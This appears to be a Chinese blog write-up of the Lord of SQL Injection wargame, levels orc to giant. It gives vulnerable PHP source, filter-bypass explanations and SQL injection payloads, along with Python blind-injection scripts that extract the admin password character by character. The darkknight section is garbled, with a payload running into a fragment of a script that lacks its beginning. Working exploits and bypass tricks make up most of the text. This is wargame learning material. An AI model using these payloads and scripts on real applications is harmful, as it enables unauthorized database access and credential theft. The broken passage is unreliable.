Lord-of-SQLInjection-Write-Up(一)

orc

  include "./config.php"; 
  login_chk(); 
  $db = dbconnect(); 
  if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~"); 
  $query = "select id from prob_orc where id='admin' and pw='{$_GET[pw]}'"; 
  echo "<hr>query : <strong>{$query}</strong><hr><br>"; 
  $result = @mysqli_fetch_array(mysqli_query($db,$query)); 
  if($result['id']) echo "<h2>Hello admin</h2>"; 

  $_GET[pw] = addslashes($_GET[pw]); 
  $query = "select pw from prob_orc where id='admin' and pw='{$_GET[pw]}'"; 
  $result = @mysqli_fetch_array(mysqli_query($db,$query)); 
  if(($result['pw']) &amp;&amp; ($result['pw'] == $_GET['pw'])) solve("orc"); 
  highlight_file(__FILE__); 

后端对表名进行限制,注入代码中不能包含表名,但是可以利用where语句进行免表名查询

payload

?pw=1'or id='admin' and ascii(binary(substr((pw),3,1)))&gt;53%23

其中的pw字段会查询前面from的prob_orc数据表
id = ‘admin’是为了取id为admin的pw字段

盲注脚本

#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
desc:
author: huha
'''
# 盲注脚本
import requests
import string
def doinject(url, sqli_input, i, num): 
    payload = "and ascii(binary(substr((%s),%d,1)))&gt;%d" % (sqli_input, i+1, num)
    payload += '%23'
    url = url
    print(url+payload)
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0',
        'Cookie':'PHPSESSID=9fpfms0cnvii35netn60uskb03'
    }
    r = requests.get(url+payload, headers=headers, timeout=20)
    #在这里定义对于不同响应的处理
    # print(r.text)
    if "Hello admin" in r.text:
        return True
    else:
        return False

def getvalue(url, len, sqli_input):
    # 二分法
    # list = '0123456789ABCDEF'
    flag = ''
    # step = 2
    for i in range(len):
        s = 33
        t = 126
        while (s &lt; t):
            m = (s + t) / 2
            result = doinject(url, sqli_input, i, m)
            if result:
                s = m + 1
            else:
                t = m
            if (t - s &lt;= 1):
                if (doinject(url, sqli_input, i, s)):
                    m = t
                    break
                else:
                    m = s
                    break
        flag += chr(int(m))
        print(flag)

        # print(m)
        # print(hex(m)[2:])
        # flag += '{0:02x}'.format(int(m))     # flag += chr(int(m))



if __name__ == '__main__':
    # 目标url
    base_url = &quot;https://los.rubiya.kr/chall/orc_60e5b360f95c1f9688e4f3a86c5dd494.php&quot;
    query = &quot;?pw=1'or id='admin' &quot;
    # query=&quot;&quot;
    url = base_url+query
    # 在这里定义你的注入语句
    sqli_input = &quot;pw&quot;
    getvalue(url, 30, sqli_input)

orge

  include &quot;./config.php&quot;; 
  login_chk(); 
  $db = dbconnect(); 
  if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit(&quot;No Hack ~_~&quot;); 
  if(preg_match('/or|and/i', $_GET[pw])) exit(&quot;HeHe&quot;); 
  $query = &quot;select id from prob_orge where id='guest' and pw='{$_GET[pw]}'&quot;; 
  echo &quot;<hr>query : <strong>{$query}</strong><hr><br>"; 
  $result = @mysqli_fetch_array(mysqli_query($db,$query)); 
  if($result['id']) echo "<h2>Hello {$result[id]}</h2>"; 

  $_GET[pw] = addslashes($_GET[pw]); 
  $query = "select pw from prob_orge where id='admin' and pw='{$_GET[pw]}'"; 
  $result = @mysqli_fetch_array(mysqli_query($db,$query)); 
  if(($result['pw']) &amp;&amp; ($result['pw'] == $_GET['pw'])) solve("orge"); 
  highlight_file(__FILE__); 

与ORC类似,or被过滤用||代替 ,但是需要的是admin的密码,而不是guest的

payload

'|| id='admin' %26%26 ascii(mid((select pw from (select 1)a),1,1))&gt;79%23

其中字符&用url编码为%26,否则用hackbar测试或者python构造盲注脚本时被认为是参数分隔符
虽然过滤表名,但是在where语句中会自动识别表名

# 进行pw字段查询

select pw from (select 1)a)
select pw

盲注脚本

#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
desc:
author: huha
'''
# 盲注脚本
import requests
import string
def doinject(url, sqli_input, i, num):
    payload = "'|| id='admin' " + '%26%26' + " ascii(mid((select %s from (select 1)a),%d,1))&gt;%d" % (sqli_input, i+1, num) + '%23'
    url = url
    print(url+payload)
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0',
        'Cookie':'PHPSESSID=mk1fatv9vr1fj4812fmopbmmr6'
    }
    r = requests.get(url+payload, headers=headers, timeout=20)
    #在这里定义对于不同响应的处理
    # print(r.text)
    if "Hello admin" in r.text:
        return True
    else:
        return False

def getvalue(url, len, sqli_input):
    # 二分法
    # list = '0123456789ABCDEF'
    flag = ''
    # step = 2
    for i in range(len):
        s = 33
        t = 126
        while (s &lt; t):
            m = (s + t) / 2
            result = doinject(url, sqli_input, i, m)
            if result:
                s = m + 1
            else:
                t = m
            if (t - s &lt;= 1):
                if (doinject(url, sqli_input, i, s)):
                    m = t
                    break
                else:
                    m = s
                    break
        flag += chr(int(m))
        print(flag)

        # print(m)
        # print(hex(m)[2:])
        # flag += '{0:02x}'.format(int(m))     # flag += chr(int(m))



if __name__ == '__main__':
    # 目标url
    base_url = &quot;https://los.rubiya.kr/chall/orge_bad2f25db233a7542be75844e314e9f3.php&quot;
    query = &quot;?pw=&quot;
    # query=&quot;&quot;
    url = base_url+query
    # 在这里定义你的注入语句
    sqli_input = &quot;pw&quot;
    getvalue(url, 30, sqli_input)

skeleton

  include &quot;./config.php&quot;; 
  login_chk(); 
  $db = dbconnect(); 
  if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit(&quot;No Hack ~_~&quot;); 
  $query = &quot;select id from prob_skeleton where id='guest' and pw='{$_GET[pw]}' and 1=0&quot;; 
  echo &quot;<hr>query : <strong>{$query}</strong><hr><br>"; 
  $result = @mysqli_fetch_array(mysqli_query($db,$query)); 
  if($result['id'] == 'admin') solve("skeleton"); 
  highlight_file(__FILE__); 

and的优先级高于or运算符,利用这点构造payload进行绕过

payload

https://los.rubiya.kr/chall/skeleton_a857a5ab24431d6fb4a00577dac0f39c.php?pw=' or id = 'admin' or '1

golem

  include "./config.php"; 
  login_chk(); 
  $db = dbconnect(); 
  if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~"); 
  if(preg_match('/or|and|substr\(|=/i', $_GET[pw])) exit("HeHe"); 
  $query = "select id from prob_golem where id='guest' and pw='{$_GET[pw]}'"; 
  echo "<hr>query : <strong>{$query}</strong><hr><br>"; 
  $result = @mysqli_fetch_array(mysqli_query($db,$query)); 
  if($result['id']) echo "<h2>Hello {$result[id]}</h2>"; 

  $_GET[pw] = addslashes($_GET[pw]); 
  $query = "select pw from prob_golem where id='admin' and pw='{$_GET[pw]}'"; 
  $result = @mysqli_fetch_array(mysqli_query($db,$query)); 
  if(($result['pw']) &amp;&amp; ($result['pw'] == $_GET['pw'])) solve("golem"); 
  highlight_file(__FILE__); 

等于号被过滤,利用like代替

payload

https://los.rubiya.kr/chall/golem_4b5202cfedd8160e73124b5234235ef5.php?pw='|| id like 'admin' %26%26 ascii(mid((select pw from (select 1)a),1,1))&lt;79%23

类似前面构造盲注脚本,不赘述。

darkknight

  include &quot;./config.php&quot;; 
  login_chk(); 
  $db = dbconnect(); 
  if(preg_match('/prob|_|\.|\(\)/i', $_GET[no])) exit(&quot;No Hack ~_~&quot;); 
  if(preg_match('/\'/i', $_GET[pw])) exit(&quot;HeHe&quot;); 
  if(preg_match('/\'|substr|ascii|=/i', $_GET[no])) exit(&quot;HeHe&quot;); 
  $query = &quot;select id from prob_darkknight where id='guest' and pw='{$_GET[pw]}' and no={$_GET[no]}&quot;; 
  echo &quot;<hr>query : <strong>{$query}</strong><hr><br>"; 
  $result = @mysqli_fetch_array(mysqli_query($db,$query)); 
  if($result['id']) echo "<h2>Hello {$result[id]}</h2>"; 

  $_GET[pw] = addslashes($_GET[pw]); 
  $query = "select pw from prob_darkknight where id='admin' and pw='{$_GET[pw]}'"; 
  $result = @mysqli_fetch_array(mysqli_query($db,$query)); 
  if(($result['pw']) &amp;&amp; ($result['pw'] == $_GET['pw'])) solve("darkknight"); 
  highlight_file(__FILE__); 

等号用like代替,单引号被过滤,字符用十六进制表示

payload

?pw=1&amp;no=1 or id like 0x61646D696E and binary(mid((select pw),1,1))%s" % (sqli_input, i+1, hex(int(num)))
    url = url
    print(url+payload)
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0',
        'Cookie':'PHPSESSID=tqrsls0kklon0lgkaor0omjv1s'
    }
    #在这里定义对于不同响应的处理
    # print(r.text)
    if "Hello admin" in r.text:
        return True
    else:
        return False

def getvalue(url, len, sqli_input):
    flag = ''
    for i in range(len):
        s = 33
        t = 126
        while (s &lt; t):
            m = (s + t) / 2
            result = doinject(url, sqli_input, i, m)
            if result:
                s = m + 1
            else:
                t = m
            if (t - s &lt;= 1):
                if (doinject(url, sqli_input, i, s)):
                    m = t
                    break
                else:
                    m = s
                    break
        flag += chr(int(m))
        print(flag)


if __name__ == '__main__':
    # 目标url
    base_url = &quot;https://los.rubiya.kr/chall/darkknight_5cfbc71e68e09f1b039a8204d1a81456.php&quot;
    query = &quot;?pw=1&amp;no=1 or id like 0x61646D696E and &quot;
    url = base_url+query
    # print(url)
    # 在这里定义你的注入语句
    sqli_input = &quot;pw&quot;
    getvalue(url, 30, sqli_input)

bugbear

  include &quot;./config.php&quot;; 
  login_chk(); 
  $db = dbconnect(); 
  if(preg_match('/prob|_|\.|\(\)/i', $_GET[no])) exit(&quot;No Hack ~_~&quot;); 
  if(preg_match('/\'/i', $_GET[pw])) exit(&quot;HeHe&quot;); 
  if(preg_match('/\'|substr|ascii|=|or|and| |like|0x/i', $_GET[no])) exit(&quot;HeHe&quot;); 
  $query = &quot;select id from prob_bugbear where id='guest' and pw='{$_GET[pw]}' and no={$_GET[no]}&quot;; 
  echo &quot;<hr>query : <strong>{$query}</strong><hr><br>"; 
  $result = @mysqli_fetch_array(mysqli_query($db,$query)); 
  if($result['id']) echo "<h2>Hello {$result[id]}</h2>"; 

  $_GET[pw] = addslashes($_GET[pw]); 
  $query = "select pw from prob_bugbear where id='admin' and pw='{$_GET[pw]}'"; 
  $result = @mysqli_fetch_array(mysqli_query($db,$query)); 
  if(($result['pw']) &amp;&amp; ($result['pw'] == $_GET['pw'])) solve("bugbear"); 
  highlight_file(__FILE__); 

这个进一步过滤,过滤了0x|空格|like|or|and,见招拆招
like用in代替
16进制表示字符改为char()
空格用注释符绕过
or|and用||和&&代替

payload

?pw=1&amp;no=1||id/**/in(select/**/CHAR(97,100,109,105,110))%26%26binary(mid((pw),1,1))&lt;CHAR(97)

类似上题构造盲注脚本,不赘述

giant

1) exit(&quot;No Hack ~_~&quot;); 
  if(preg_match('/ |\n|\r|\t/i', $_GET[shit])) exit(&quot;HeHe&quot;); 
  $query = &quot;select 1234 from{$_GET[shit]}prob_giant where 1&quot;; 
  echo &quot;<hr>query : <strong>{$query}</strong><hr><br>"; 
  $result = @mysqli_fetch_array(mysqli_query($db,$query)); 
  if($result[1234]) solve("giant"); 
  highlight_file(__FILE__); 
?&gt;

目标很明确,找到可以当作空格又不被过滤的字符
本地生成字典

for x in range(0, 256):
    print('%{0:02x}'.format(x))

在这里插入图片描述
利用burp进行fuzz
在这里插入图片描述
%0b跟%0c可以被当作空格

发表评论

电子邮件地址不会被公开。 必填项已用*标注

此站点使用Akismet来减少垃圾评论。了解我们如何处理您的评论数据